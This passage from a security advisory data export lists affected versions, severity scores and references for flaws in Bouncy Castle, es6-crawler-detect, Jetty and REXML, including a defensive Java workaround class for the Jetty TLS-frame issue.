[{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.65'}, {'fixed': '1.67'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-ext-jdk15on'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.65'}, {'fixed': '1.67'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk14'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.65'}, {'fixed': '1.67'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk16'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.65'}, {'fixed': '1.67'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-ext-jdk16'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.65'}, {'fixed': '1.67'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28052'}, {'type': 'WEB', 'url': 'https://github.com/bcgit/bc-java/commit/97578f9b7ed277e6ecb58834e85e3d18385a4219'}, {'type': 'PACKAGE', 'url': 'https://github.com/bcgit/bc-java'}, {'type': 'WEB', 'url': 'https://github.com/bcgit/bc-java/wiki/CVE-2020-28052'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r167dbc42ef7c59802c2ca1ac14735ef9cf687c25208229993d6206fe@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r175f5a25d100dbe2b1bd3459b3ce882a84c3ff91b120ed4ff2d57b53@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r25d53acd06f29244b8a103781b0339c5e7efee9099a4d52f0c230e4a@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2ddabd06d94b60cfb0141e4abb23201c628ab925e30742f61a04d013@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r30a139c165b3da6e0d5536434ab1550534011b1fdfcd2f5d95892c5b@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r37d332c0bf772f4982d1fdeeb2f88dd71dab6451213e69e43734eadc@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4e1619cfefcd031fac62064a3858f5c9229eef907bd5d8ef14c594fc@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r77af3ac7c3bfbd5454546e13faf7aec21d627bdcf36c9ca240436b94@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8c36ba34e80e05eecb1f80071cc834d705616f315b634ec0c7d8f42e@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r954d80fd18e9dafef6e813963eb7e08c228151c2b6268ecd63b35d1f@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc9e441c1576bdc4375d32526d5cf457226928e9c87b9f54ded26271c@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcd37d9214b08067a2e8f2b5b4fd123a1f8cb6008698d11ef44028c21@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdcbad6d8ce72c79827ed8c635f9a62dd919bb21c94a0b64cab2efc31@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rddd2237b8636a48d573869006ee809262525efb2b6ffa6eff50d2a2d@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdfd2901b8b697a3f6e2c9c6ecc688fd90d7f881937affb5144d61d6e@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf9abfc0223747a56694825c050cc6b66627a293a32ea926b3de22402@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfc0db1f3c375087e69a239f9284ded72d04fbb55849eadde58fa9dc2@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://www.bouncycastle.org/releasenotes.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://www.synopsys.com/blogs/software-security/cve-2020-28052-bouncy-castle/'}]","{'cwe_ids': ['CWE-670'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-19T00:15:55Z', 'nvd_published_at': '2020-12-18T01:15:00Z'}" +1.4.0,GHSA-jxg6-fhwc-9v9c,2021-03-23T19:29:27Z,2021-04-13T15:19:39Z,,['CVE-2020-28501'],Regular Expression Denial of Service (ReDoS) in es6-crawler-detect,This affects the package es6-crawler-detect before 3.1.3. No limitation of user agent string length supplied to regex operators.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'es6-crawler-detect'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28501'}, {'type': 'WEB', 'url': 'https://github.com/JefferyHus/es6-crawler-detect/pull/27'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ES6CRAWLERDETECT-1051529'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T19:29:27Z', 'nvd_published_at': '2021-03-22T12:15:00Z'}" +1.4.0,GHSA-26vr-8j45-3r4w,2022-08-10T23:33:55Z,2021-04-06T17:31:30Z,,['CVE-2021-28165'],"Jetty vulnerable to incorrect handling of invalid large TLS frame, exhausting CPU resources","### Impact +When using SSL/TLS with Jetty, either with HTTP/1.1, HTTP/2, or WebSocket, the server may receive an invalid large (greater than 17408) TLS frame that is incorrectly handled, causing CPU resources to eventually reach 100% usage. + +### Workarounds + +The problem can be worked around by compiling the following class: +```java +package org.eclipse.jetty.server.ssl.fix6072; + +import java.nio.ByteBuffer; +import javax.net.ssl.SSLEngine; +import javax.net.ssl.SSLEngineResult; +import javax.net.ssl.SSLException; +import javax.net.ssl.SSLHandshakeException; + +import org.eclipse.jetty.io.EndPoint; +import org.eclipse.jetty.io.ssl.SslConnection; +import org.eclipse.jetty.server.Connector; +import org.eclipse.jetty.server.SslConnectionFactory; +import org.eclipse.jetty.util.BufferUtil; +import org.eclipse.jetty.util.annotation.Name; +import org.eclipse.jetty.util.ssl.SslContextFactory; + +public class SpaceCheckingSslConnectionFactory extends SslConnectionFactory +{ + public SpaceCheckingSslConnectionFactory(@Name(""sslContextFactory"") SslContextFactory factory, @Name(""next"") String nextProtocol) + { + super(factory, nextProtocol); + } + + @Override + protected SslConnection newSslConnection(Connector connector, EndPoint endPoint, SSLEngine engine) + { + return new SslConnection(connector.getByteBufferPool(), connector.getExecutor(), endPoint, engine, isDirectBuffersForEncryption(), isDirectBuffersForDecryption()) + { + @Override + protected SSLEngineResult unwrap(SSLEngine sslEngine, ByteBuffer input, ByteBuffer output) throws SSLException + { + SSLEngineResult results = super.unwrap(sslEngine, input, output); + + if ((results.getStatus() == SSLEngineResult.Status.BUFFER_UNDERFLOW || + results.getStatus() == SSLEngineResult.Status.OK && results.bytesConsumed() == 0 && results.bytesProduced() == 0) && + BufferUtil.space(input) == 0) + { + BufferUtil.clear(input); + throw new SSLHandshakeException(""Encrypted buffer max length exceeded""); + } + return results; + } + }; + } +} +``` +This class can be deployed by: + + The resulting class file should be put into a jar file (eg sslfix6072.jar) + + The jar file should be made available to the server. For a normal distribution this can be done by putting the file into ${jetty.base}/lib + + Copy the file `${jetty.home}/modules/ssl.mod` to `${jetty.base}/modules` + + Edit the `${jetty.base}/modules/ssl.mod` file to have the following section: + +``` +[lib] +lib/sslfix6072.jar +``` + ++ Copy the file `${jetty.home}/etc/jetty-https.xml` and`${jetty.home}/etc/jetty-http2.xml` to `${jetty.base}/etc` ++ Edit files `${jetty.base}/etc/jetty-https.xml` and `${jetty.base}/etc/jetty-http2.xml`, changing any reference of `org.eclipse.jetty.server.SslConnectionFactory` to `org.eclipse.jetty.server.ssl.fix6072.SpaceCheckingSslConnectionFactory`. For example: +```xml + + + + http/1.1 + + + + +``` ++ Restart Jetty","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.2.2'}, {'fixed': '9.4.39'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.0.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-26vr-8j45-3r4w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28165'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse/jetty.project'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r002258611ed0c35b82b839d284b43db9dcdec120db8afc1c993137dc@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r03ca0b69db1e3e5f72fe484b71370d537cd711cbf334e2913332730a@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r05db8e0ef01e1280cc7543575ae0fa1c2b4d06a8b928916ef65dd2ad@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r06d54a297cb8217c66e5190912a955fb870ba47da164002bf2baffe5@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r077b76cafb61520c14c87c4fc76419ed664002da0ddac5ad851ae7e7@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0841b06b48324cfc81325de3c05a92e53f997185f9d71ff47734d961@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0a241b0649beef90d422b42a26a2470d336e59e66970eafd54f9c3e2@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0a4797ba6ceea8074f47574a4f3cc11493d514c1fab8203ebd212add@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0bf3aa065abd23960fc8bdc8090d6bc00d5e391cf94ec4e1f4537ae3@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0cd1a5e3f4ad4770b44f8aa96572fc09d5b35bec149c0cc247579c42@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0f02034a33076fd7243cf3a8807d2766e373f5cb2e7fd0c9a78f97c4@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r111f1ce28b133a8090ca4f809a1bdf18a777426fc058dc3a16c39c66@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r17e26cf9a1e3cbc09522d15ece5d7c7a00cdced7641b92a22a783287@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r23785214d47673b811ef119ca3a40f729801865ea1e891572d15faa6@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2afc72af069a7fe89ca2de847f3ab3971cb1d668a9497c999946cd78@%3Ccommits.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2ea2f0541121f17e470a0184843720046c59d4bde6d42bf5ca6fad81@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2f2d9c3b7cc750a6763d6388bcf5db0c7b467bd8be6ac4d6aea4f0cf@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r31f591a0deac927ede8ccc3eac4bb92697ee2361bf01549f9e3440ca@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r33eb3889ca0aa12720355e64fc2f8f1e8c0c28a4d55b3b4b8891becb@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r40136c2010fccf4fb2818a965e5d7ecca470e5f525c232ec5b8eb83a@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r401b1c592f295b811608010a70792b11c91885b72af9f9410cffbe35@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r411d75dc6bcefadaaea246549dd18e8d391a880ddf28a796f09ce152@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r47a7542ab61da865fff3db0fe74bfe76c89a37b6e6d2c2a423f8baee@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4891d45625cc522fe0eb764ac50d48bcca9c0db4805ea4a998d4c225@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4a66bfbf62281e31bc1345ebecbfd96f35199eecd77bfe4e903e906f@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4abbd760d24bab2b8f1294c5c9216ae915100099c4391ad64e9ae38b@%3Cdev.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4b1fef117bccc7f5fd4c45fd2cabc26838df823fe5ca94bc42a4fd46@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r520c56519b8820955a86966f499e7a0afcbcf669d6f7da59ef1eb155@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r56e5568ac73daedcb3b5affbb4b908999f03d3c1b1ada3920b01e959@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5b3693da7ecb8a75c0e930b4ca26a5f97aa0207d9dae4aa8cc65fe6b@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5d1f16dca2e010193840068f1a1ec17b7015e91acc646607cbc0a4da@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5f172f2dd8fb02f032ef4437218fd4f610605a3dd4f2a024c1e43b94@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r64ff94118f6c80e6c085c6e2d51bbb490eaefad0642db8c936e4f0b7@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6535b2beddf0ed2d263ab64ff365a5f790df135a1a2f45786417adb7@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r65daad30d13f7c56eb5c3d7733ad8dddbf62c469175410777a78d812@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r694e57d74fcaa48818a03c282aecfa13ae68340c798dfcb55cb7acc7@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6ac9e263129328c0db9940d72b4a6062e703c58918dd34bd22cdf8dd@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6b070441871a4e6ce8bb63e190c879bb60da7c5e15023de29ebd4f9f@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6ce2907b2691c025250ba010bc797677ef78d5994d08507a2e5477c9@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6f256a1d15505f79f4050a69bb8f27b34cb353604dd2f765c9da5df7@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r71031d0acb1de55c9ab32f4750c50ce2f28543252e887ca03bd5621e@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7189bf41cb0c483629917a01cf296f9fbdbda3987084595192e3845d@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r72bf813ed4737196ea3ed26494e949577be587fd5939fe8be09907c7@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r746434be6abff9ad321ff54ecae09e1f09c1c7c139021f40a5774090@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r769155244ca2da2948a44091bb3bb9a56e7e1c71ecc720b8ecf281f0@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7bf7004c18c914fae3d5a6a0191d477e5b6408d95669b3afbf6efa36@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7c40fb3a66a39b6e6c83b0454bc6917ffe6c69e3131322be9c07a1da@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r81748d56923882543f5be456043c67daef84d631cf54899082058ef1@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r83453ec252af729996476e5839d0b28f07294959d60fea1bd76f7d81@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r90327f55db8f1d079f9a724aabf1f5eb3c00c1de49dc7fd04cad1ebc@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r940f15db77a96f6aea92d830bc94d8d95f26cc593394d144755824da@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r942f4a903d0abb25ac75c592e57df98dea51350e8589269a72fd7913@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9974f64723875052e02787b2a5eda689ac5247c71b827d455e5dc9a6@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9b793db9f395b546e66fb9c44fe1cd75c7755029e944dfee31b8b779@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9db72e9c33b93eba45a214af588f1d553839b5c3080fc913854a49ab@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9fae5a4087d9ed1c9d4f0c7493b6981a4741cfb4bebb2416da638424@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra210e38ae0bf615084390b26ba01bb5d66c0a76f232277446ae0948a@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra21b3e6bd9669377139fe33fb46edf6fece3f31375bc42a0dcc964b2@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra50519652b0b7f869a14fbfb4be9758a29171d7fe561bb7e036e8449@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra9dd15ba8a4fb7e42c7fe948a6d6b3868fd6bbf8e3fb37fcf33b2cd0@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rae8bbc5a516f3e21b8a55e61ff6ad0ced03bdbd116d2170a3eed9f5c@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raea6e820644e8c5a577f77d4e2044f8ab52183c2536b00c56738beef@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb00345f6b1620b553d2cc1acaf3017aa75cea3776b911e024fa3b187@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb11a13e623218c70b9f2a2d0d122fdaaf905e04a2edcd23761894464@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb1624b9777a3070135e94331a428c6653a6a1edccd56fa9fb7a547f2@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb2d34abb67cdf525945fe4b821c5cdbca29a78d586ae1f9f505a311c@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb66ed0b4bb74836add60dd5ddf9172016380b2aeefb7f96fe348537b@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb8f5a6ded384eb00608e6137e87110e7dd7d5054cc34561cb89b81af@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbab9e67ec97591d063905bc7d4743e6a673f1bc457975fc0445ac97f@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbba0b02a3287e34af328070dd58f7828612f96e2e64992137f4dc63d@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbc075a4ac85e7a8e47420b7383f16ffa0af3b792b8423584735f369f@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbcd7b477df55857bb6cae21fcc4404683ac98aac1a47551f0dc55486@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbd9a837a18ca57ac0d9b4165a6eec95ee132f55d025666fe41099f33@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc4779abc1cface47e956cf9f8910f15d79c24477e7b1ac9be076a825@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc4dbc9907b0bdd634200ac90a15283d9c143c11af66e7ec72128d020@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc6c43c3180c0efe00497c73dd374cd34b62036cb67987ad42c1f2dce@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc907ed7b089828364437de5ed57fa062330970dc1bc5cd214b711f77@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcdea97f4d3233298296aabc103c9fcefbf629425418c2b69bb16745f@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd0471252aeb3384c3cfa6d131374646d4641b80dd313e7b476c47a9c@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd24d8a059233167b4a5aebda4b3534ca1d86caa8a85b10a73403ee97@%3Ccommits.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd6c1eb9a8a94b3ac8a525d74d792924e8469f201b77e1afcf774e7a6@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd755dfe5f658c42704540ad7950cebd136739089c3231658e398cf38@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd7c8fb305a8637480dc943ba08424c8992dccad018cd1405eb2afe0e@%3Cdev.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd9ea411a58925cc82c32e15f541ead23cb25b4b2d57a2bdb0341536e@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdbf2a2cd1800540ae50dd78b57411229223a6172117d62b8e57596aa@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdde34d53aa80193cda016272d61e6749f8a9044ccb37a30768938f7e@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdf4fe435891e8c35e70ea5da033b4c3da78760f15a8c4212fad89d9f@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdfe5f1c071ba9dadba18d7fb0ff13ea6ecb33da624250c559999eaeb@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re0545ecced2d468c94ce4dcfa37d40a9573cc68ef5f6839ffca9c1c1@%3Ccommits.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re3a1617d16a7367f767b8209b2151f4c19958196354b39568c532f26@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re577736ca7da51952c910b345a500b7676ea9931c9b19709b87f292b@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re6614b4fe7dbb945409daadb9e1cc73c02383df68bf9334736107a6e@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ree1895a256a9db951e0d97a76222909c2e1f28c1a3d89933173deed6@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf1b02dfccd27b8bbc3afd119b212452fa32e9ed7d506be9357a3a7ec@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf6de4c249bd74007f5f66f683c110535f46e719d2f83a41e8faf295f@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf99f9a25ca24fe519c9346388f61b5b3a09be31b800bf37f01473ad7@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfc9f51b4e21022b3cd6cb6f90791a6a6999560212e519b5f09db0aed@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfd3ff6e66b6bbcfb2fefa9f5a20328937c0369b2e142e3e1c6774743@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210611-0006/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4949'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/04/20/3'}]","{'cwe_ids': ['CWE-400', 'CWE-551', 'CWE-755'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-02T23:02:13Z', 'nvd_published_at': '2021-04-01T15:15:00Z'}" +1.4.0,GHSA-8cr8-4vfw-mr7h,2022-08-22T19:43:17Z,2021-04-30T17:30:37Z,,['CVE-2021-28965'],REXML round-trip instability,"The REXML gem before 3.2.5 in Ruby before 2.6.7, 2.7.x before 2.7.3, and 3.x before 3.0.1 does not properly address XML round-trip issues. An incorrect document can be produced after parsing and serializing. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'rexml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.5'}]}]}]","[{'type': 'ADVISORY', 'url': 